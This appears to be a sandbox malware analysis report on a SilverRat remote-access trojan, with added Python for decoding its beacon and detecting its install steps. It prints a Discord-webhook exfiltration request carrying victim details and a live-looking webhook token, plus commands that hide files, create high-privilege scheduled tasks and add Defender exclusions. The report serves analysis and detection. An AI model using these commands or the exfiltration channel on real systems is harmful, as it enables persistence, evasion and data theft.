IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xaa44 | 0xac00 | c2b14b283ee3cec7ebaae6c8cb1256b8 | False | 0.5033157703488372 | data | 5.6120712775063835 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xe000 | 0x4d0 | 0x600 | 6b0f67afb8070f92423b8e34f11082c3 | False | 0.3723958333333333 | data | 3.6947970197850175 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xe0a0 | 0x23c | data | - | - | 0.46853146853146854
RT_MANIFEST | 0xe2e0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | - | - | 0.5469387755102041
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-13T21:11:36.230576+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.7 | 49781 | TCP
2024-11-13T21:12:14.628423+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.7 | 49981 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 13, 2024 21:11:14.865227938 CET | 62949 | 53 | 192.168.2.7 | 1.1.1.1
Nov 13, 2024 21:11:30.560632944 CET | 56442 | 53 | 192.168.2.7 | 1.1.1.1
Nov 13, 2024 21:11:30.568001986 CET | 53 | 56442 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 13, 2024 21:11:14.865227938 CET | 192.168.2.7 | 1.1.1.1 | 0x1add | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
Nov 13, 2024 21:11:30.560632944 CET | 192.168.2.7 | 1.1.1.1 | 0x47e4 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 13, 2024 21:11:14.872944117 CET | 1.1.1.1 | 192.168.2.7 | 0x1add | No error (0) | time.windows.com | twc.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 13, 2024 21:11:17.000811100 CET | 1.1.1.1 | 192.168.2.7 | 0x3236 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 13, 2024 21:11:17.000811100 CET | 1.1.1.1 | 192.168.2.7 | 0x3236 | No error (0) | s-part-0017.t-0009.t-msedge.net | - | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 21:11:30.568001986 CET | 1.1.1.1 | 192.168.2.7 | 0x47e4 | No error (0) | discord.com | - | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 21:11:30.568001986 CET | 1.1.1.1 | 192.168.2.7 | 0x47e4 | No error (0) | discord.com | - | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 21:11:30.568001986 CET | 1.1.1.1 | 192.168.2.7 | 0x47e4 | No error (0) | discord.com | - | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 21:11:30.568001986 CET | 1.1.1.1 | 192.168.2.7 | 0x47e4 | No error (0) | discord.com | - | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 21:11:30.568001986 CET | 1.1.1.1 | 192.168.2.7 | 0x47e4 | No error (0) | discord.com | - | 162.159.128.233 | A (IP address) | IN (0x0001) | false
                                                      • discord.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49760 | 162.159.137.232 | 443 | 7992 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 20:11:31 UTC | 255 | OUT | POST /api/webhooks/1306009594367180840/Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4vkRdq1c70arvb91az-VPT HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: discord.com
Content-Length: 414
Expect: 100-continue
Connection: Keep-Alive
2024-11-13 20:11:31 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                      Data Ascii: username=Hey+ADMIN&avatar_url=https%3a%2f%2fg.top4top.io%2fp_2522c7w8u1.png&content=You+have+a+client+online+now+%7b+New+%7d%0a++%e2%9c%85+Username+%3a+user%40376483%0a++%e2%9c%85+System+%3a+Microsoft+Windows+10+Pro%0a++%e2%9c%85+HWID+%3a+A21313F253B
                                                      Timestamp:2024-11-13 20:11:31 UTC  Bytes transferred:1296  Direction:IN
                                                      Data:
                                                      HTTP/1.1 404 Not Found
                                                      Date: Wed, 13 Nov 2024 20:11:31 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 45
                                                      Connection: close
                                                      Cache-Control: public, max-age=3600, s-maxage=3600
                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                      x-ratelimit-limit: 5
                                                      x-ratelimit-remaining: 4
                                                      x-ratelimit-reset: 1731528693
                                                      x-ratelimit-reset-after: 1
                                                      via: 1.1 google
                                                      alt-svc: h3=":443"; ma=86400
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qW73MYqKH3Z90xhdPmQ0gadTnrC5LwF78B4rIcEsGOBbKbFt5FAb7TF5TB%2BsfAtRkkv1IVWKnXI3t893J9JuotwNXlvOJgP4slxxcpgwFU6R9JN9Q78YJOhN3NrE"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      X-Content-Type-Options: nosniff
                                                      Set-Cookie: __cfruid=4dda201f464c81e917efe784742ecb12015cec99-1731528691; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                      Set-Cookie: _cfuvid=27Y0rH0vNJF3OpOz3GsOUjHcHWN1QbZUj3jzzy7z4Gc-1731528691632-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                      Server: cloudflare
                                                      CF-RAY: 8e2169518d364630-DFW
                                                      {"message": "Unknown Webhook", "code": 10015}
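The POST above is a Discord webhook message: username and avatar_url set the display name and icon of the bot post, and content carries the victim fingerprint, one "key : value" line per attribute (account name, OS, HWID). Discord answered 404 with code 10015 "Unknown Webhook", so the webhook no longer existed at analysis time and this check-in never reached an operator, although the implant itself keeps running (Target ID 10 below has not exited). Note also that the Data Raw hex and the Data Ascii rendering disagree in the Username field: the bytes 66 72 6f 6e 74 64 65 73 6b spell "frontdesk" where the rendering shows "user", so decode the raw bytes when extracting IOCs rather than the pretty-printed line. The following decoder is an added example, not code from the report or from the sample; it uses only what the capture shows (the report displays just the first part of the 414-byte body and nothing here completes it).

```python
"""Decode the Discord-webhook check-in captured above.

Added example: not part of the Joe Sandbox report and not the sample's own
code. Inputs are copied from the capture; nothing is completed or guessed.
"""
import json
import re
from urllib.parse import parse_qs

# Request line as captured (webhook id and token are part of the URL path).
REQUEST_LINE = ("POST /api/webhooks/1306009594367180840/"
                "Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4vkRdq1c70arvb91az-VPT HTTP/1.1")

# "Data Raw" hex from the capture: the unmodified bytes on the wire. The report
# displays only the first part of the 414-byte body; this is that part, as shown.
DATA_RAW = (
    "75 73 65 72 6e 61 6d 65 3d 48 65 79 2b 41 44 4d 49 4e 26 61 76 61 74 61 72 5f 75 72 6c 3d "
    "68 74 74 70 73 25 33 61 25 32 66 25 32 66 67 2e 74 6f 70 34 74 6f 70 2e 69 6f 25 32 66 70 5f "
    "32 35 32 32 63 37 77 38 75 31 2e 70 6e 67 26 63 6f 6e 74 65 6e 74 3d 59 6f 75 2b 68 61 76 65 "
    "2b 61 2b 63 6c 69 65 6e 74 2b 6f 6e 6c 69 6e 65 2b 6e 6f 77 2b 25 37 62 2b 4e 65 77 2b 25 37 "
    "64 25 30 61 2b 2b 25 65 32 25 39 63 25 38 35 2b 55 73 65 72 6e 61 6d 65 2b 25 33 61 2b 66 72 "
    "6f 6e 74 64 65 73 6b 25 34 30 33 37 36 34 38 33 25 30 61 2b 2b 25 65 32 25 39 63 25 38 35 2b "
    "53 79 73 74 65 6d 2b 25 33 61 2b 4d 69 63 72 6f 73 6f 66 74 2b 57 69 6e 64 6f 77 73 2b 31 30 "
    "2b 50 72 6f 25 30 61 2b 2b 25 65 32 25 39 63 25 38 35 2b 48 57 49 44 2b 25 33 61 2b 41 32 31 "
    "33 31 33 46 32 35 33 42"
)

# "Data Ascii" rendering of the same capture (the report's pretty-printed line).
DATA_ASCII = ("username=Hey+ADMIN&avatar_url=https%3a%2f%2fg.top4top.io%2fp_2522c7w8u1.png"
              "&content=You+have+a+client+online+now+%7b+New+%7d%0a++%e2%9c%85+Username+%3a+user%40376483"
              "%0a++%e2%9c%85+System+%3a+Microsoft+Windows+10+Pro%0a++%e2%9c%85+HWID+%3a+A21313F253B")

WEBHOOK_RE = re.compile(r"^\w+\s+/api/webhooks/(?P<id>\d+)/(?P<token>[\w-]+)\s+HTTP/")
# One host attribute per line: optional leading non-word chars (spaces, emoji), key, colon, value.
ATTR_RE = re.compile(r"^\W*([A-Za-z]+)\s*:\s*(.*?)\s*$")


def decode_data_raw(hex_dump: str) -> bytes:
    """Turn the report's space-separated hex into the original bytes."""
    return bytes.fromhex(hex_dump)


def parse_webhook_request_line(line: str):
    """Extract webhook id and token from the path; both are IOCs, the token is the secret."""
    m = WEBHOOK_RE.match(line)
    return {"webhook_id": m.group("id"), "webhook_token": m.group("token")} if m else None


def parse_beacon_body(body: str) -> dict:
    """Decode the x-www-form-urlencoded message and pull host attributes out of 'content'."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    victim = {}
    for line in fields.get("content", "").splitlines():
        m = ATTR_RE.match(line)
        if m:
            victim[m.group(1)] = m.group(2)
    return {"fields": fields, "victim": victim}


def classify_response(status_line: str, json_body: str) -> str:
    """Map Discord's reply to what it means for the operator's notification channel."""
    code = json.loads(json_body).get("code")
    if status_line.startswith("HTTP/1.1 404") and code == 10015:
        return "webhook_deleted"  # Unknown Webhook: the message never reached anyone
    if status_line.startswith("HTTP/1.1 2"):
        return "webhook_accepted"
    return "other"


if __name__ == "__main__":
    wire = parse_beacon_body(decode_data_raw(DATA_RAW).decode("ascii"))
    print(json.dumps({"webhook": parse_webhook_request_line(REQUEST_LINE),
                      "victim_from_raw": wire["victim"],
                      "victim_from_ascii": parse_beacon_body(DATA_ASCII)["victim"]},
                     indent=2, ensure_ascii=False))
```

The webhook id and the token are the durable indicators here; the token alone authorises posting to the hook, so handle it like a credential when sharing the report, even though Discord reports this one as gone.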



                                                      Target ID:0
                                                      Start time:15:11:18
                                                      Start date:13/11/2024
                                                      Path:C:\Users\user\Desktop\YDW0S5K7hi.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\YDW0S5K7hi.exe"
                                                      Imagebase:0x4b0000
                                                      File size:46'080 bytes
                                                      MD5 hash:FE4EE341B4E7E0D03E27893BD6070A3E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: 00000000.00000000.1355697494.00000000004B2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: 00000000.00000002.1404296493.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:15:11:22
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\attrib.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver"
                                                      Imagebase:0x7ff63fc10000
                                                      File size:23'040 bytes
                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:15:11:22
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:15:11:22
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\attrib.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe"
                                                      Imagebase:0x7ff63fc10000
                                                      File size:23'040 bytes
                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:15:11:22
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:15:11:22
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9C90.tmp.bat""
                                                      Imagebase:0x7ff678460000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:15:11:22
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:15:11:22
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\timeout.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:timeout 3
                                                      Imagebase:0x7ff6f4c50000
                                                      File size:32'768 bytes
                                                      MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:15:11:25
                                                      Start date:13/11/2024
                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe"
                                                      Imagebase:0x6f0000
                                                      File size:46'080 bytes
                                                      MD5 hash:FE4EE341B4E7E0D03E27893BD6070A3E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 61%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:11
                                                      Start time:15:11:28
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"schtasks.exe" /query /TN $77HelpPanel.exe
                                                      Imagebase:0x7ff68a0d0000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:12
                                                      Start time:15:11:28
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:15:11:28
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
                                                      Imagebase:0x7ff68a0d0000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:15:11:28
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:15:11:29
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"schtasks.exe" /query /TN $77HelpPanel.exe
                                                      Imagebase:0x7ff68a0d0000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:16
                                                      Start time:15:11:29
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:17
                                                      Start time:15:11:29
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                                                      Imagebase:0x7ff741d30000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:18
                                                      Start time:15:11:29
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:19
                                                      Start time:15:11:29
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "HelpPanel_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
                                                      Imagebase:0x7ff68a0d0000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:20
                                                      Start time:15:11:29
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:21
                                                      Start time:15:11:29
                                                      Start date:13/11/2024
                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe "\$77HelpPanel.exe" /AsAdmin
                                                      Imagebase:0x370000
                                                      File size:46'080 bytes
                                                      MD5 hash:FE4EE341B4E7E0D03E27893BD6070A3E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:22
                                                      Start time:15:11:31
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x7ff7fb730000
                                                      File size:496'640 bytes
                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false
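Read together, Target IDs 3 to 21 are the install sequence: the sample copies itself to ...\Templates\comserver\$77HelpPanel.exe (same MD5 as the original), hides the folder and the file with attrib +s +h, cmd.exe runs a batch file from %TEMP%, timeout 3 follows and the copy starts three seconds later; after that, schtasks registers a ONCE task with /RL HIGHEST whose action relaunches the copy with /AsAdmin, PowerShell adds Defender exclusions for the exe, bat, dll and ps1 extensions, and a second, daily 21:00 task is created whose action is the literal string %MyFile% (the variable was not expanded in the captured command line, so verify the task definition on the host rather than assuming where it points). The following is an added example, not part of the report and not a vendor rule: it encodes those command lines as constructed records and runs a small rule set over them, the kind of logic you would port to process-creation telemetry (Sysmon Event ID 1 or an EDR's process events). The $77 rule is an assumption: that prefix is the naming convention the r77 rootkit uses for items it hides, but the report does not confirm r77 is present.

```python
"""Flag the persistence and defence-evasion steps in the process list above.

Added example, not from the Joe Sandbox report and not a vendor rule. The
records are constructed from the command lines the report shows (keyed by the
report's "Target ID", not a real PID); the rules illustrate what to look for
in process-creation telemetry such as Sysmon Event ID 1.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    target_id: int
    image: str
    cmdline: str


DROP_DIR = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver"

# Constructed from the report's process entries (verbatim command lines).
PROCS = [
    Proc(0, r"C:\Users\user\Desktop\YDW0S5K7hi.exe", r'"C:\Users\user\Desktop\YDW0S5K7hi.exe"'),
    Proc(3, r"C:\Windows\System32\attrib.exe",
         r'"C:\Windows\System32\attrib.exe" +s +h "' + DROP_DIR + '"'),
    Proc(5, r"C:\Windows\System32\attrib.exe",
         r'"C:\Windows\System32\attrib.exe" +s +h "' + DROP_DIR + r'\$77HelpPanel.exe"'),
    Proc(7, r"C:\Windows\System32\cmd.exe",
         r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9C90.tmp.bat""'),
    Proc(9, r"C:\Windows\System32\timeout.exe", "timeout 3"),
    Proc(10, DROP_DIR + r"\$77HelpPanel.exe", '"' + DROP_DIR + r'\$77HelpPanel.exe"'),
    Proc(11, r"C:\Windows\System32\schtasks.exe", r'"schtasks.exe" /query /TN $77HelpPanel.exe'),
    Proc(13, r"C:\Windows\System32\schtasks.exe",
         r'"schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "' + DROP_DIR
         + r'\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST'),
    Proc(17, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
         r'Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit'),
    Proc(19, r"C:\Windows\System32\schtasks.exe",
         r'"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "HelpPanel_Task-DAILY-21PM" '
         r'/TR "%MyFile%" /ST 21:00'),
    Proc(21, DROP_DIR + r"\$77HelpPanel.exe",
         DROP_DIR + r'\$77HelpPanel.exe "\$77HelpPanel.exe" /AsAdmin'),
    Proc(22, r"C:\Windows\System32\wbem\WmiPrvSE.exe",
         r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"),
]

APPDATA = re.compile(r"\\AppData\\(?:Roaming|Local)\\", re.I)


def classify(p: Proc) -> list:
    """Return the rule names that fire for one process-creation record."""
    name = p.image.rsplit("\\", 1)[-1].lower()
    cl = p.cmdline
    hits = []
    # attrib +s/+h on a user-writable path: hiding a dropped payload from Explorer and dir
    if name == "attrib.exe" and re.search(r"\+[sh]\b", cl) and APPDATA.search(cl):
        hits.append("attrib_hide_appdata_path")
    if name == "schtasks.exe" and re.search(r"/create\b", cl, re.I):
        if re.search(r"/RL\s+HIGHEST\b", cl, re.I):
            hits.append("schtasks_create_highest_runlevel")   # action runs with highest privileges
        if APPDATA.search(cl):
            hits.append("schtasks_create_appdata_action")     # action lives under %APPDATA%
        if re.search(r'/TR\s+"?%[^%"]+%"?', cl, re.I):
            hits.append("schtasks_create_unexpanded_env_var")  # /TR "%MyFile%" left literal
    if name == "powershell.exe" and re.search(r"Set-MpPreference\b.*-Exclusion", cl, re.I):
        hits.append("defender_exclusion_added")
    if name == "cmd.exe" and re.search(r"\\Temp\\[^\"]+\.bat\b", cl, re.I):
        hits.append("cmd_runs_temp_batch")
    # Assumption: "$77" is the prefix the r77 rootkit hides; the report does not confirm r77.
    if re.search(r"\\\$77\w", p.image) or re.search(r"\$77\w", cl):
        hits.append("dollar77_prefix")
    return hits


def scan(procs) -> dict:
    """Map Target ID to rule hits for every record that fires at least one rule."""
    results = {}
    for p in procs:
        hits = classify(p)
        if hits:
            results[p.target_id] = hits
    return results


if __name__ == "__main__":
    for tid, hits in scan(PROCS).items():
        print(f"Target {tid:>2}: {', '.join(hits)}")
```

Ported to real telemetry, each rule should be keyed on the parent process as well (here the interesting parents are the dropped copy and cmd.exe running a %TEMP% batch file); the report's timeline gives the order but this example deliberately works from command lines alone.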


                                                        Execution Graph

                                                        Execution Coverage:32.5%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:33.3%
                                                        Total number of Nodes:9
                                                        Total number of Limit Nodes:0

                                                        Callgraph (interactive graph not reproduced; in the original rendering nodes are coloured executed / not executed, with opacity indicating relevance and disassembly available per node)
